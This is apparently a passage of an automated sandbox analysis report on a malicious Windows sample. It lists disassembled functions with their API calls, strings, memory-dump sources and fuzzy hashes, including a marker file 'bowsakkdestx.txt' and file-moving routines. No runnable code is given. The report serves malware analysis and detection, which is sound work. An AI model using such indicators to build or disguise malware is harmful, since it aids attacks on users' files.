Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

invalid string position, xrefs: 00417D2C
string too long, xrefs: 00417D36

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

invalid string position, xrefs: 00414260
string too long, xrefs: 00414256

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14
.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,?), ref: 0040C5F6
RpcStringFreeA.RPCRT4(?), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32(00000030), ref: 0041BA73

Strings

LPCWSTRszWindowClass, xrefs: 0041BA65
0, xrefs: 0041BA1D

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00419EB8
_memset.LIBCMT ref: 00419EC9
_memset.LIBCMT ref: 00419EDA

Strings

p2Q, xrefs: 00419EE2

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 004C70AB

Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9

_UnwindNestedFrames.LIBCMT ref: 004C70C2
___FrameUnwindToState.LIBCMT ref: 004C70D4
CallCatchBlock.LIBCMT ref: 004C70F8

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5

Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015

__calloc_crt.LIBCMT ref: 00425A01

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__lock.LIBCMT ref: 00425A37
___addlocaleref.LIBCMT ref: 00425A43
__lock.LIBCMT ref: 00425A57

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
String ID:
API String ID: 2580527540-0
Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00412806
_malloc.LIBCMT ref: 00412814

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 0041281F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004149F1

Strings

invalid string position, xrefs: 00414C3D
string too long, xrefs: 00414C33

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

invalid string position, xrefs: 00417EDF
string too long, xrefs: 00417EE9

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA

Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277

Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73

Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD

GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
TranslateMessage.USER32(?), ref: 0041B4CD
DispatchMessageW.USER32(?), ref: 0041B4D7

Strings

%username%, xrefs: 0041B283
I:\5d2860c89d774.jpg, xrefs: 0041B32F

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
String ID: %username%$I:\5d2860c89d774.jpg
API String ID: 441990211-897913220
Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
